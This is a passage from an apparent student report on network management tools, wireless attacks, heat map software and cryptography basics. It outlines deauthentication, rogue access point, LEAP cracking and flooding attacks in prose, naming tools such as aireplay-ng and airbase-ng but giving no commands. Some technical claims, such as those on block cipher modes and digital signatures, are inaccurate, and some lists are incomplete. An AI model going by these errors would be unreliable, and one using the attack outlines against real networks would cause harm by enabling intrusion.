increases its raw data capabilities and enhances the analytical abilities of ManageEngine
NetFlow Analyzer
▪ Site-to-site traffic monitoring: View site-to-site traffic patterns in your network.
Allocate your bandwidth appropriately.
▪ Application-specific usage monitoring: View the top applications on your network.
Make sure that your applications critical to your business get maximum priority.
▪ iPhone Application support dashboard: Monitor your network traffic (LAN & WAN
traffic) on the move, from anywhere, at any time.

Page 26 of 56
3. Network Configuration Management: Network Configuration Manager is a multi-vendor
network change, configuration and compliance management (NCCCM) solution for
switches, routers, firewalls and other network devices. NCM helps automate and take total
control of the entire life cycle of device configuration management.

Key Features

▪ Configuration Management: Backup device configurations, maintain history, compare

versions & upload changes, all from a centralized web GUI
▪ Real-time Change Tracking: Monitors configuration changes, get instant notifications
and prevent unauthorized changes
▪ Compliance Auditing: Defines standard practices and policies and automatically check
device configurations for compliance.
▪ Automating Configuration Tasks: Automates all repetitive, time-consuming
configuration management tasks. Apply configuration changes in bulk.
▪ User Activity Tracking: Gets complete record of who, what and when of configuration
changes. Record actions, archive and playback
▪ Multi-vendor Support: Manage configurations of network devices from multiple
vendors such as Cisco, Juniper, HP, and more.
▪ Encrypted Storage of Configuration & Centralized Control: Network Configuration
Manager stores device configurations in encrypted form in the PostgreSQL database
bundled with the product ensuring security. Besides, there is also provision for SSH
communication between Network Configuration Manager and devices. Network
Configuration Manager serves as a secure, centralized repository of device
configurations.

Page 27 of 56
4. OpUtils: OpUtils is a Switch Port & IP Address Management software that helps network
engineers manage their Switches and IP Address Space with ease. With its comprehensive set
of 30+ tools, it helps them to perform network monitoring tasks like detecting a rogue device
intrusion, keep a check on bandwidth usage, monitoring availability of critical devices,
backing up Cisco configuration files and more.

Key Features
▪ IP Address Management: Scan IPv4 & IPv6 subnets in the network to identify the
available and used IP Addresses.
▪ Switch Port Management: Scan all the switches in your network and map the switch
ports to devices down to its physical location.
▪ Rogue Infrastructure Detection: Identify the rogue device intrusions and block their
access.
▪ Network Monitoring tools: Monitor the critical servers in the network for
availability and alert for immediate attention.

Page 28 of 56
 WIRELESS ENTERPRISE ATTACKS
Wireless Fidelity (Wi-Fi) refers to wireless local area network, as we all know them. It is based
on IEEE 802.11 standard. Wi-Fi is a type of wireless network you meet almost everywhere, at
your home, workplace, in hotels, restaurants and even in taxis, trains or planes. These 802.11
communication standards operate on either 2.4 GHz or 5 GHz ISM radio bands. These devices
are easily available in the shops that are compatible with Wi-Fi standard. Due to the fact, that
802.11 based wireless network are so heavily used in all types of environments - they are also the
biggest subject for various security researches across other 802.11 standards.
The following table summarizes the current 802.11 standards that are used in our times:

Standard Frequency Max speed

802.11 2.4 GHz 2 Mbps

802.11a 5 GHz 54 Mbps

802.11b 2.4 GHz 11 Mbps

802.11g 2.4 GHz 54 Mbps

802.11n 2.4 or 5 GHz 600 Mbps

802.11ac 5 GHz 1 Gbps

DIFFERENT TYPES OF ATTACKS

Following are the frequently occurring wireless network attacks:

1. Access Control Attacks
2. Integrity Attacks
3. Confidentiality Attacks
4. DOS Attack
▪ Layer 1 DOS
▪ Layer 2 DOS
▪ Layer 3 DOS
5. Authentication Attacks
6. Rogue Access Point Attacks
7. Client Mis association
8. Misconfigured Access Point Attacks
9. Ad-Hoc Connection Attacks

Page 29 of 56
Access Control Attack
The concept of access control is all about controlling, who have access to the network, and who
does not. It prevents malicious 3rd parties (unauthorized) from associating to the wireless
network. The idea of access control is very similar to an authentication process; however, those
two concepts are complementary. Authentication is most often based on a set of credentials
(username & password) and access control may go beyond that and verify other characteristics of
the client user or client user's device.
Very well-known access control mechanism used in wireless networks is based on MAC address
whitelisting. The AP stores a list of authorized MAC addresses that are eligible to access the
wireless network. With tools available nowadays, this security mechanism is not a very strong
one, since MAC address (hardware address of the wireless client's chipset) may be spoofed very
simply.
The only challenge is to find out what MAC addresses are allowed by AP to authenticate to the
network. But since wireless medium is a shared one, anyone can sniff the traffic flowing through
the air and see the MAC addresses in the frames with valid data traffic (they are visible in the
header that is not encrypted).
This is the information that the attacker does not have in the beginning. However, since wireless
medium is "open" for sniffing, he may use Wireshark to listen to those devices that are connected
and talking to the AP at a particular time.
Specialized authentication servers can differentiate whether a particular client is a PC produced
by HP, IPhone from Apple (what kind of IPhone) or some other wireless clients, only by looking
at the way how wireless frames from a particular client looks like and comparing them to the set
of "baselines", known for particular vendors. However, this is not something you may see on the
home networks. Those solutions are quite expensive and require more complex infrastructure
integrating multiple types of servers - most likely met in some of the corporate environments.

Integrity Attack
Integrity of the information is a characteristic that ensures that data was not tampered, when
going from point A to point B over the network (either wireless or wired). When speaking about
wireless communication, 802.11 radios can be overheard by any 3rd party on the same frequency
channel. A simple type of attack against integrity of the information is illustrated in the following
diagram:

Page 30 of 56
Let's imagine that legitimate wireless client is sending an e-mail to the client and needs to login
to the email service provider using some sensitive credentials.
Assuming the information is not well encrypted (or attacker broke the encryption and have the
chance of reading everything in clear text), wireless attacker reads the whole packet flowing in
the air to the AP. The attacker modifies a message by swapping the credentials to its own and re-
inject a message back to go to the internet via the AP.
In that situation, if there are no integrity checks that would detect a change in the content of the
message - the recipient would get a message with a modified response probably losing his
account. The situation described would be extremely hard to implement in real life, since all the
tools like mail exchange, are secure against those types of attacks (via proper encryption and
message integrity checks), it perfectly shows the concept of the attack.
There are 2 main counter-measures against this type of an integrity attack: encryption (so that
attacker would not be able to read the message at all) and Message Integrity Codes (MICs) that
are basically hashing function like MD5 or SHA1 that take a footprint of the whole message and
create a hash of 128 bits (MD5) or 160 bits (SHA1). Anytime, there is a change in the packet
content, the hash value would also change, resulting in message being denied (already by
wireless router).

Confidentiality Attack
The role of attacks targeting the confidentiality of the information, is simply to break the
encryption model used in the wireless deployment. Looking at variety of security models in the
field the following general recommendations may be put:
• No Encryption/ WEP Encryption – These are not very secure approaches and should not be
used under any circumstances.
• TKIP Encryption – This encryption model is used in WPA deployments. It has not yet been
cracked, but TKIP is not considered as strong mean of encryption, due to the use of weaker
RC4 algorithm.

Page 31 of 56
• CCMP Encryption – This is used with WPA2. So far, it is considered the safest encryption
model that is based on not-breakable (at least for today) AES algorithm.

The main goal of all kinds of attacks is to break the encryption and get a value of the key. This
would give the attacker 2 things: broken confidentiality of other users and direct access to the
wireless network.

Denial of Service Attack

The attacks which are directed at disabling the service (making the target not available) or
degrading its performance (lowering the availability) lands under the umbrella of Denial of
Service (DoS) attacks. The cost of such an attack may be very expensive for a victim or
companies, whose business is based on e-commerce. They can count the costs of the attack in
millions of dollars, depending on the length of their web service not being available.
Wireless networks are also playing a crucial part in productivity of the employees. We all use
wireless laptops and smartphones in a workplace. With the lack of wireless network working, our
productivity is decreased.
DoS attacks on availability may be divided into 3 types:

1. Layer 1 DoS
2. Layer 2 DoS
3. Layer 3 DoS

Layer 1 DoS

This is a consequence of radio frequency interference (either intentional or unintentional). Most

often, unintentional interferences are seen on the 2.4 GHz band, since it's very busy. Devices
such as RF video cameras, cordless phones or microwave ovens may use this band. As for
intentional interference, there are RF jammers that may interfere with 802.11 WLANs. The RF
jammers may be a hardware unit or a software tool (example "Websploit" framework present in
Kali Linux).

Layer 2 Dos

These attacks are the ones which are most likely launched by malicious attackers. The main idea
behind this attack is to temper the 802.11 wireless frames and inject (or retransmit) them into the
air.
The most common types of Layer 2 DoS attacks involve spoofing of disassociation or de-
authentication management frames. The reason, why it is so efficient is that, those frames are
NOT the request frames but notifications!

Page 32 of 56
Because authentication process is a pre-requisite for association (as illustrated above), a de-
authentication frame will automatically disassociate the client as well.
This kind of attack maybe, started using airoplay-ng tool.

Mitigation technique against those type of attacks is to use an 802.11w-2009 Standard

Management Frame Protection (MFP). In simple words, this standard requires that
management frames (like disassociation or de-authentications frames) are also signed by a
trusted AP, and if they come from a malicious client or a fake AP, they should be neglected.

Layer 3 DoS

The idea of this Layer 3 DoS is to overwhelm the host with a large volume of traffic to process,
resulting in crashing of a host. Most often, this type of attack is originated from a set of hacker-
owned hosts, called botnet and is targeting the victim server on the internet.
The three most common types of Layer 3 DoS attacks are:

Fraggle Attack

Attacker sends a large amount of UDP echo requests to IP broadcast address. The source IP
address is spoofed and is set to a victim IP address. By doing that, all the replies originated on by
the clients on the broadcast subnet are sent back to the victim.

Page 33 of 56
Ping Flood Attack

Attacker sends a large number of ICMP packet to the target computer using ping. Imagine a
malicious party that owns botnet of thousands of PCs. If we imagine a ping flood attack running
at the same time from all of those PC, then it may become pretty serious.

Smurf Attack

Exactly the same step by step operation, as in case of Fraggle Attack. The only difference is that,
Smurf attack uses ICMP echo request packets, opposite to Fraggle attack that uses UDP packets.
These type of Layer 3 DoS attacks are not specifically wireless technology attacks. They can be
used over any Layer 2 technology, either Ethernet, Frame Relay, ATM or Wireless. The main
requirement of this attack to be successful, is that the attacker is in control of a large number of
overtaken PCs (botnet). Then particular packets are sent to the target from each and every single
infected host in the Botnet - assuming that botnet has 1000+ devices, the cumulative traffic may
be significant. Using a Layer 3 DoS from a single PC is not effective at all.

Authentication Attack
As you probably know by now, authentication is the method of verifying the presented identity
and credentials. Most of the authentication schemes used in wireless setups are secured with
proper encryption.
We have already described the scenario based on EAP-authentication used in WPA/WPA2, with
PSK authentication. By sniffing the 4-way handshake between the client and the authenticator
(AP), one may perform a brute-force attack (example – offline dictionary attack) to break the
encryption and derive the PSK value.
Another example can be LEAP (Lightweight Extensible Authentication Protocol). It was used in
olden times as a mechanism to generate dynamic WEP keys. In this setup, the password hashes
were flowing over-the-air hashed with MS-CHAP or MS-CHAPv2 algorithms (both of them are
crack-able with an offline dictionary attack). A short description of the authentication attack that
may be applied to LEAP would consist of the following steps:

1. The username is sent in a clear text.

2. There is a challenge text in clear text.
3. The response text is hashed.
4. Office dictionary attack, pure brute force attacks, that can be used here (using aircrack-ng
tool) to try all the combinations of the password inside "function(password,challenge) =
response" mathematical formula, to find the right password.
5. Password dictionaries can be found on the internet or can be made using special tools like
cewl, winrtgen, rtgen, etc.
6. Even though these attacks may take a while to be successful there is a big chance of it
being unsuccessful.

Page 34 of 56
Rogue Access Point Attacks
The corporate WLAN is an authorized and secured wireless portal to the network resources. A
rogue access device (AP) is any WLAN radio that is connected to the corporate network (most
often to some network switch) without the authorization.
Most of the rogue access points that are installed by employees (malicious users or by mistake)
are actually not the same AP's that the IT department in the organization is using, but some
Small-office home-office (SOHO) wireless routers - the same ones, that you probably have at
home. In the situation when they are misconfigured or configured without any security - it opens
a next attack surface for having easy access to a very secure network).
With the current evolution of the IT industry, rogue access point might be very well hidden and
extremely hard to find.
If the network resources are exposed by a rogue access point, the following risks may be
identified:

1. Data Theft – Corporate data may be compromised.

2. Data Destruction – Databases may be erased.
3. Loss of Services – Network services can be disabled.
4. Malicious Data Insertion – An attacker may use a portal to upload viruses, key loggers.
5. 3rd Party Attacks – A company's wired network may be used as a launching pad for 3rd
party attacks against other networks across the internet.

Client Mis association

You may have already experienced the situation, that when you come with your PC and use
wireless at home, your PC is automatically connecting to the WLAN, without any actions
required from you. This is because, your laptop remembers the list of WLANs that you were
connected to in the past and stores this list in the so-called Preferred Network List (in a windows
world).
A malicious hacker may use this default behavior and bring its own wireless AP to the physical
area, where you are normally using your Wi-Fi. If the signal from that AP, would be better than
the one from original AP, the laptop software will mis-associate to the fake (rogue) access point
provided by the hacker (thinking it is the legitimate AP, you have used in the past). These kinds
of attacks are very easy to perform in some big open spaces, such as airports, office
environments or public areas. These kinds of attacks are sometimes referred to as Honeypot AP
Attacks.
Creating a fake AP does not require any physical hardware. The Linux distribution, used through
all this tutorial is Kali Linux, has an internal tool called airbase-ng that can create AP with
specific MAC address and WLAN name (SSID) with a single command.

Page 35 of 56
Misconfigured Access Point Attack
The Misconfigured APs are a type of security surface, that are the easiest to breach, if its
detected. The place, where you will most likely meet misconfigured AP's are home wireless
network or very small businesses. Large wireless environments are most likely using centralized
management platforms that control hundreds or thousands of AP and keep them synchronized,
therefore it is less likely to meet any configuration error there.
Most common areas of misconfiguration, that leads to wireless cracking’s are:
1. Some AP configurations are left to factory defaults, like usernames and passwords or default
WLAN's broadcasted (SSID's) and default settings may be found in manuals of the specific
vendor on the internet.
2. Human Error - advanced security policies are configured on a set of APs’ across the
organization, and other ones are forgotten and left with default weak security settings.

Ad-Hoc Connection Attack

Ad-Hoc Connection attacks are very nasty type of attacks, where the attacker (malicious user) is
using a 3rd party legitimate user as an additional hop or man-in-the-middle between attacker's
device and AP or other type of gateways.
Ad-Hoc wireless network feature, required to be working on "device-in-the middle", can be
configured on both Windows or Linux device, and it allows to setup ad-hoc (peer-to-peer)
wireless link between client devices (without any additional network infrastructure like AP).
Behind the scenes, what you actually do, is that you create virtual software AP on your PC and
the other device is associating with the SSID you have created (effectively making wireless link).
When using Linux, you may use the tool called "airbase-ng" described earlier in this chapter. On
the other hand, when using Windows, the WLAN may be created in a wireless network setting
using "configure new connection or new network".

Page 36 of 56
 Heat Map Testing
A diagram of signal strength in a Wi-Fi network. Using a wireless monitor tool, a visual map of a
workplace gives the network administrator invaluable knowledge about how to adjust the access
points (APs) for better coverage.
A heat map is a graphical representation of data where the individual values contained in a
matrix are represented as colors. Fractal maps and tree maps both often use a similar system of
color-coding to represent the values taken by a variable in a hierarchy. Heat maps help you get
an instant feel for an area by grouping places into categories and displaying their density
visually. The darker the color is, the higher is the density.

Types of Heat Maps

1. Mouse move heat map: MouseStats Mouse Move Heatmaps is the only alternative solution
for eye-tracking on mass volume at an affordable cost. Based on millions of visitors’ mouse
movements data, MouseStats will create a meaningful, comprehensive and simple-to-
understand heatmap for each page you want to analyze it.
Usage
▪ Finding hidden UI issues
▪ Advertisement best places

2. Network Atlas maps: Network Atlas is a powerful tool for creating custom maps and
network diagrams. The maps created in Network Atlas enable users to view a graphical
depiction of their network in the Orion Web Console. The maps can also be used to create
network documentation, which can then be printed and exported as needed.
Usage

▪ Monitor NPM nodes, interfaces, and volumes

▪ SAM applications and components
▪ Nested maps, and
▪ Display network links.

3. Wi-Fi Coverage & Wireless Performance Heatmaps: Visualize heatmaps for signal/noise,
WLAN throughput, PHY data rates, retry rates, and packet losses at every location on the
floor
Usage
▪ A good wireless network mapper will allow you to visualize your WiFi coverage, your
signal strength, noise and interference across your entire network area
▪ Troubleshoot poor wi-fi signal

Page 37 of 56
4. Access Point Wireless Heat Maps: Heatmaps to view coverage and performance of your
backup APs in case of missing or down primary Aps
5. Channel Overlap WLAN Heat Maps: Used to see the primary and secondary channel
overlap heatmaps to mitigate channel interference and maximize the performance potential of
802.11 networks

Tools to perform Heat Map Tests

1. Crazy Egg: Crazy Egg is one of the biggest names in the industry. It’s easy to use, it
comes with a 30-day free trial, and there are 4 payment tiers to match every website’s
demands. From a feature standpoint, Crazy Egg offers advanced features on their higher
tier.

Features and Benefits

a. Heatmap Reports
b. Scrollmap Reports
c. Confetti Reports
d. Overlay Reports
e. List Reports
f. Multiple Domain Usage
g. A/B Testing Feature
h. Recordings feature

Pros
▪ Scrollmap shows how far users scroll before page abandonment.
▪ Site-clicks segmented by search terms and referral sources.
▪ Easy to determine what is hot on your site and make changes.

Cons
▪ The interface lacks user friendliness.
▪ Data collection can be sporadic.

Pricing
▪ Basic: The basic tier costs $9/month and tracks: 10,000 visitors a month and 10
active pages.
▪ Standard: Standard is for growing websites and costs $19/month. This tier tracks:
25,000 visitors a month and 20 active pages.
▪ Plus: The most “popular” option costs $49/month. Under Plus, 100,000 visitors are
tracked across 50 active pages with hourly reports offered. This tier also comes with:
1. Advanced filtering
2. Mobile heatmaps

Page 38 of 56
 3. Priority email support
▪ Pro: The final tier is the Pro tier and costs $99/month. Meant for large websites,
250,000 visitors are tracked across 100 pages. Hourly reports are provided, and
advanced features include:
1. Advanced filtering
2. Mobile heatmaps
3. Priority email support
4. Multiple users

2. Lucky Orange: Lucky Orange offer a great suite of tools that help you visualize visitor
behavior. It’s all about the features (more on that shortly). Compared to Crazy Egg, for
example, Lucky Orange offers a wide range of tools to understand your user’s behavior.
A 7-day free trial is offered (no credit card needed), and you’ll be able to test out these
features for yourself.

Features & Benefits

a. Form Analytics
b. Real-time Analytics
c. Visitor Recordings / Live Sessions
d. Heatmaps (click, mouse movement and scrolling)
e. Live Visitor Map
f. Visitor Polls

Pros
▪ Offers a full suite of optimization tools all at one price.
▪ Beautiful dashboard that is easy to use.
▪ Screen recording allows for true visitor behavior viewing.
▪ Accurate data and easy setup.

Cons
▪ Too much data provides data “overload” with little actionable insights.

Page 39 of 56
 Pricing
▪ Small: Small allows you to track up to 3 sites, 50,000 monthly page views and have 2
chat operators. This tier costs $10/month.
▪ Medium: Medium allows 6 sites to be tracked, 100,000 monthly page views to be
logged, and 4 chat operators. Pricing is $20/month.
▪ Large: Large allows 12 sites to be tracked, 250,000-page views, and 8 chat operators.
Pricing is $50/month.
▪ Extra Large: The X Large tier enables 25 sites to be tracked, 1 million-page views,
and 11 chat operators. This tier costs $100/month.

3. SolarWinds: The increasing demand for wireless devices means that you need a proper
management system. For example, it's difficult to assess Wi-Fi coverage because you
cannot see dead-spots with the naked eye. Throughout this review keep in mind that
managing wireless heat maps is only one part of what SolarWinds Network Performance
Monitor can do for your enterprise.

Features and Benefits

a. Monitor Wireless Networks
b. Manage Interfaces
c. Troubleshoot Unknow Nodes
d. Set up and monitor Cisco Unified Computing Systems (UCS)
e. Create wireless heat maps
f. Disable the wireless heat map poller
g. Set a floor plan as the background
h. Set the wireless heat map scale
i. Add wireless access points

Pros
▪ Offers a full suite of optimization tools all at one price.
▪ User friendly dashboard with good documentation.

Cons
▪ Does not provide complete accuracy making it a bit unreliable.
▪ Few Obsolete Features yet not removed from the tool.
Pricing
▪ 30 days free trial but price start from 2895 USD

Page 40 of 56
Fundamental Concept followed in cyber security for data
security
Confidentiality
When we talk about confidentiality of information, we are talking about protecting the
information from disclosure to unauthorized parties.
Disclosure can be of two types intended or unintended. A very key component of protecting
information confidentiality would be encryption. Encryption ensures that only the right people
(people who knows the key) can read the information. Encryption is VERY widespread in
today’s environment and can be found in almost every major protocol in use. A very prominent
example will be SSL/TLS, a security protocol for communications over the internet that has been
used in conjunction with a large number of internet protocols to ensure security.
Other ways to ensure information confidentiality include enforcing file permissions and access
control list to restrict access to sensitive information.

Biggest threat to confidentiality of information are as follows

• Social Engineering Attacks: the use of deception to manipulate individuals into divulging
confidential or personal information that may be used for fraudulent purposes
Preventive Measures.
▪ Layering of defense
▪ Separation of duties
▪ Employee training
• Media Reuse: It’s a know fact that deleting a file is not actually deleting the contents of
the file rather deleting the pointer to that file. Neither is formatting a drive an option as a
forensics expert can extract most of the data/information that was present in that drive
Preventive Measures
▪ Destroy Hard drive by shredding
• Eavesdropping by setting up packet sniffers and rouge infrastructure dns server and
domain controller:
Preventive Measures
▪ Using Kerberos

Integrity
Integrity of information refers to protecting information from being modified by unauthorized
parties.
Information only has value if it is correct. Information that has been tampered with could prove
costly. For example, if you were sending an online money transfer for $100, but the information
was tampered in such a way that you actually sent $10,000, it could prove to be very costly for
you.
As with data confidentiality, cryptography plays a very major role in ensuring data integrity.
Commonly used methods to protect data integrity includes hashing the data you receive and

Page 41 of 56
comparing it with the hash of the original message. However, this means that the hash of the
original data must be provided to you in a secure fashion. More convenient methods would be to
use existing schemes such as GPG to digitally sign the data.
This is a question regarding data integrity, with several suggestions on how to protect data
integrity.

Availability
Availability of information refers to ensuring that authorized parties are able to access the
information when needed.
Information only has value if the right people can access it at the right times. Denying access to
information has become a very common attack nowadays. Almost every week you can find news
about high profile websites being taken down by DDoS attacks. The primary aim of DDoS
attacks is to deny users of the website access to the resources of the website. Such downtime can
be very costly. Other factors that could lead to lack of availability to important information may
include accidents such as power outages or natural disasters such as floods.
How does one ensure data availability? Backup is key. Regularly doing off-site backups can
limit the damage caused by damage to hard drives or natural disasters. For information services
that is highly critical, redundancy might be appropriate. Having an off-site location ready to
restore services in case anything happens to your primary data centers will heavily reduce the
downtime in case of anything happens.

Non-Repudiation
Non-repudiation refers to a state of affairs where the author of a statement will not be able to
successfully challenge the authorship of the statement or validity of an associated contract. The
term is often seen in a legal setting wherein the authenticity of a signature is being challenged. In
such an instance, the authenticity is being "repudiated".
In a general sense non-repudiation involves associating actions or changes to a unique individual.
For a secure area, for example, it may be desirable to implement a key card access system. Non-
repudiation would be violated if it were not also a strictly enforced policy to prohibit sharing of
the key cards and to immediately report lost or stolen cards. Otherwise determining who
performed the action of opening the door cannot be trivially determined. Similarly, for computer
accounts, the individual owner of the account must not allow others to use that account,
especially, for instance, by giving away their account's password, and a policy should be
implemented to enforce this. This prevents the owner of the account from denying actions
performed by the account.

Access Control
Access control is the ability to limit and control the access to host systems and applications via
communications links. To achieve this, each entity trying to gain access must first be identified,
or authenticated, so that access rights can be tailored to the individual.

Page 42 of 56
 Network Security Model
The network security involves all tools, devices, strategies and activities which enterprises and
organizations undertake to protect their networks, data and operations. An effective network
security strategy must include the most effective set of tools for identification and reflection
various threats and attacks. Creation of well thought-out network security model will effectively
help you in realization your network's security.

The network security model (NSM) is a scheme that reflects the general plan and the policy of
ensuring the network security, and usually includes all or some of the following seven layers in
different modifications according to the specific company's needs:

1. Physical layer - involves organization of physical security against the access to the data
on computer devices, this can be access control devices, cameras, alarm.
2. VLAN layer - involves creation of Virtual Local Area Networks (VLANs) which join
together common hosts for security purposes.
3. ACL layer - supposes creation and maintenance of Access Control Lists (ACLs) which
allow or deny the access between hosts on different networks. Software layer - helps to
protect the user layer and ensures the software's actuality.
4. User layer - involves the user’s training of security on the network.
5. Administrative layer - supposes the training of administrative users.
6. IT department layer - this layer is the most important for network security, it contains
all network security professionals and support specialists, network technicians and
architects, which organize and maintain the work of the network and hosts.

Page 43 of 56
Cryptographic measures to increase network security
• Key Management in Cloud based services
Encryption provides data protection(integrity) while key management enables access to
protected data (access control). It is strongly recommended to encrypt data in transit over
networks, at rest, and on backup media. In particular, data to encrypt their own data. Both
encryption and key management are very important to help secure applications and data
stored in the Cloud. Requirements of effective key management are discussed below. But, a
constraint is needed to be kept in mind that the performance of the system does not decline
much due to integration of cryptographic policies

1. Secure key stores: The key stores themselves must be protected from malicious users. If
a malicious user gains access to the keys, they will then be able to access any encrypted
data the key is corresponded to. Hence the key stores themselves must be protected in
storage, in transit and on backup media.
2. Access to key stores: Access to the key stores should be limited to the users that have the
rights to access data. Separation of roles should be used to help control access. The entity
that uses a given key should not be the entity that stores the key.
3. Key backup and recoverability: Keys need secure backup and recovery solutions. Loss
of keys, although effective for destroying access to data, can be highly devastating to a
business and Cloud providers need to ensure that keys aren’t lost through backup and
recovery mechanisms.

• Cryptography Mechanism
Cryptography is a method of storing and transmitting data in a particular form so that only
those for whom it is intended can read and process it. The term is most often associated with
scrambling plaintext message (ordinary text, sometimes referred to as cleartext) into
ciphertext (a process called encryption), then back again (known as decryption). There are, in
general, three types of cryptographic schemes typically used to accomplish these goals:
secret key (or symmetric) cryptography, public-key (or asymmetric) cryptography, and hash
functions, each of which is described below.

▪ Secret Key Cryptography

With secret key cryptography, a single key is used for both encryption and decryption. As
shown in Figure 2, the sender A uses the key K (or some set of rules) to encrypt the
plaintext message M and sends the ciphertext C to the receiver. The receiver applies the
same key K (or ruleset) to decrypt the cipher text C and recover the plaintext message M.
Because a single key is used for both functions, secret key cryptography is also called
symmetric encryption. With this form of cryptography, it is obvious that the key must be
known to both the sender and the receiver (private decryption and encryption key) that, in
fact, is the secret. The biggest difficulty with this approach, of course, is the distribution
of the key. Secret key cryptography schemes are generally categorized as being either

Page 44 of 56
stream ciphers or block ciphers. Stream ciphers operate on a single bit (byte or computer
word) at a time and implement some form of feedback mechanism so that the key is
constantly changing. A block cipher is so-called because the scheme encrypts one block
of data at a time using the same key on each block. In general, the same plaintext block
will always encrypt to the same ciphertext when using the same key in a block cipher
whereas the same plaintext will encrypt to different ciphertext in a stream cipher.

Block ciphers can operate in one of several modes; the following four are the most
important:

1. Electronic Codebook (ECB) mode is the simplest, most obvious application: the
secret key is used to encrypt the plaintext block to form a ciphertext block. Two
identical plaintext blocks, then, will always generate the same ciphertext block.
Although this is the most common mode of block ciphers, it is susceptible to a variety
of brute-force attacks.
2. Cipher Block Chaining (CBC) mode adds a feedback mechanism to the encryption
scheme. In CBC, the plaintext is exclusively-ORed (XORed) with the previous
ciphertext block prior to encryption. In this mode, two identical blocks of plaintext
never encrypt to the same ciphertext.
3. Cipher Feedback (CFB) mode is a block cipher implementation as a self-
synchronizing stream cipher. CFB mode allows data to be encrypted in units smaller
than the block size, which might be useful in some applications such as encrypting
interactive terminal input. If we were using 1-byte CFB mode, for example, each
incoming character is placed into a shift register the same size as the block,
encrypted, and the block transmitted. At the receiving side, the ciphertext is decrypted
and the extra bits in the block (i.e., everything above and beyond the one byte) are
discarded.

Secret key cryptography algorithms that are in use today include:

1. Data Encryption Standard (DES): DES is a block-cipher employing a 56-bit key

that operates on 64-bit blocks. DES algorithm as described by Davis R. takes a fixed-
length string of plaintext bits and transforms it through a series of complicated
operations into cipher text bit string of the same length. 3DES (Triple DES) [6] is an
enhancement of DES; it is 64-bit block size with 192 bits key size. In this standard
the encryption method is similar to the one in the original DES but applied 3 times to
increase the encryption level and the average safe time.
2. Advanced Encryption Standard (AES): AES is a block cipher intended to replace
DES for commercial applications. It uses a 128-bit block size and a key size of 128,
192, or 256 bits. The number of internal rounds of the cipher is a function of the key
length. The number of rounds for 128- bit key is 10. Unlike its predecessor DES, AES
does not use a Feistel network. Feistel networks do not encrypt an entire block per

Page 45 of 56
 iteration, e.g., in DES, 64/2 = 32 bits are encrypted in one round. AES, on the other
hand, encrypts all 128 bits in one iteration.
3. Blowfish: Blowfish is a symmetric 64-bit block cipher, invented by Bruce Schneier;
optimized for 32-bit processors with large data caches, it is significantly faster than
DES on a Pentium/PowerPC-class machine. Key lengths can vary from 32 to 448 bits
in length. Blowfish, available freely and intended as a substitute for DES or IDEA, is
in use in a large number of products. It is a 16-round Feistel cipher and uses large
key-dependent S-boxes. The S-boxes accept 8-bit input and produce 32-bit output.
One entry of the P-array is used every round, and after the final round, each half of
the data block is XORed with one of the two remaining unused P-entries.
4. Twofish: A 128-bit block cipher using 128-, 192-, or 256-bit keys. Designed to be
highly secure and highly flexible, well-suited for large microprocessors, 8-bit smart
card microprocessors, and dedicated hardware. Designed by a team led by Bruce
Schneier and was one of the Round 2 algorithms in the AES process. Twofish's
distinctive features are the use of pre-computed key-dependent S-boxes, and a
relatively complex key schedule. One half of an n-bit key is used as the actual
encryption key and the other half of the n-bit key is used to modify the encryption
algorithm (key-dependent S-boxes). Twofish borrows some elements from other
designs; for example, the pseudo-Hadamard transform(PHT) from the SAFER family
of ciphers. Twofish has a Feistel structure like DES.
5. Camellia: A secret-key, block-cipher crypto algorithm developed jointly by Nippon
Telegraph and Telephone (NTT) Corp. and Mitsubishi Electric Corporation (MEC) in
2000. C has some characteristics in common with AES: a 128-bit block size, support
for 128-, 192-, and 256-bit key lengths, and suitability for both software and hardware
implementations on common 32-bit processors as well as 8-bit processors (e.g., smart
cards, cryptographic hardware, and embedded systems). Camellia is a Feistel cipher
with either 18 rounds (when using 128-bit keys) or 24 rounds (when using 192 or
256-bit keys). Every six rounds, a logical transformation layer is applied: the so-
called "FL-function" or its inverse. Camellia uses four 8 x 8-bit S-boxes with input
and output affine transformations and logical operations. The cipher also uses input
and output key whitening. The diffusion layer uses a linear transformation based on a
matrix with a branch number of 5.
6. KASUMI: A block cipher using a 128-bit key and block size 64-bit, is part of the
Third-Generation Partnership Project (3gpp), formerly known as the Universal
Mobile Telecommunications System (UMTS). KASUMI is the intended
confidentiality and integrity algorithm for both message content and signaling data
for emerging mobile communications systems. KASUMI is used in the A5/3 key
stream generator and in GPRS in the GEA3 key stream generator. In 2010,
Dunkelman, Keller and Shamir published a new attack that allows an adversary to
recover a full A5/3 key by related-key attack. The core of KASUMI is an eight-round
Feistel network. The round functions in the main Feistel network are irreversible
Feistel-like network transformations. In each round the round function uses a round

Page 46 of 56
 key which consists of eight 16-bit sub keys derived from the original 128-bit key
using a fixed key schedule

Now a days Advanced Encryption Standard (AES) is most commonly used secret
key encryption algorithm.

▪ Public-key cryptography is a form of cryptosystem in which encryption and decryption

are performed using the different keys—one a public key and one a private key. These
keys are mathematically related although knowledge of one key does not allow someone
to easily determine the other key. As shown in Figure 3, the sender A uses the public key
of receiver B (or some set of rules) to encrypt the plaintext message M and sends the
ciphertext C to the receiver. The receiver applies own private key (or ruleset) to decrypt
the cipher text C and recover the plaintext message M. Because pair of keys is required,
this approach is also called asymmetric cryptography. Asymmetric encryption can be
used for confidentiality, authentication, or both.

RSA
The first, and still most common, public key cryptography implementation, named for the
three MIT mathematicians who developed it — Ronald Rivest, Adi Shamir, and Leonard
Adleman. RSA today is used in hundreds of software products and can be used for key
exchange, digital signatures, or encryption of small blocks of data. RSA uses a variable
size encryption block and a variable size key. The key-pair is derived from a very large
number, n, that is the product of two prime numbers chosen according to special rules;
these primes may be 100 or more digits in length each, yielding an n with roughly twice
as many digits as the prime factors. RSA has three phases: Key Generation, Encryption,
and Decryption.

• Elliptic Curve Cryptography: It is analog of Diffie-Hellman Key Exchange. ECC [16, 17]
is a public key cryptography algorithm based upon elliptic curves. Elliptic curve arithmetic
can be used to develop a variety of elliptic curve cryptography (ECC) schemes, including key
exchange, encryption, and digital signature. For purposes of ECC, elliptic curve arithmetic
involves the use of an elliptic curve equation defined over a finite field. The coefficients and
variables in the equation are elements of a finite field. Security of ECC is based on the
intractability of ECDLP i.e. Elliptic Curve Discrete Logarithm Problem.
• Digital Signature Standard
The digital signature standard (DSS) is an NIST standard that uses the secure hash algorithm
(SHA) [18]. A digital signature is an authentication mechanism that enables the creator of a
message to attach a code that acts as a signature. Typically, the signature is formed by taking
the hash of the message and encrypting the message with the creator’s private key. The
signature guarantees the source and integrity of the message.

Page 47 of 56
 Comparative study between different cloud network
management system
Range of products:
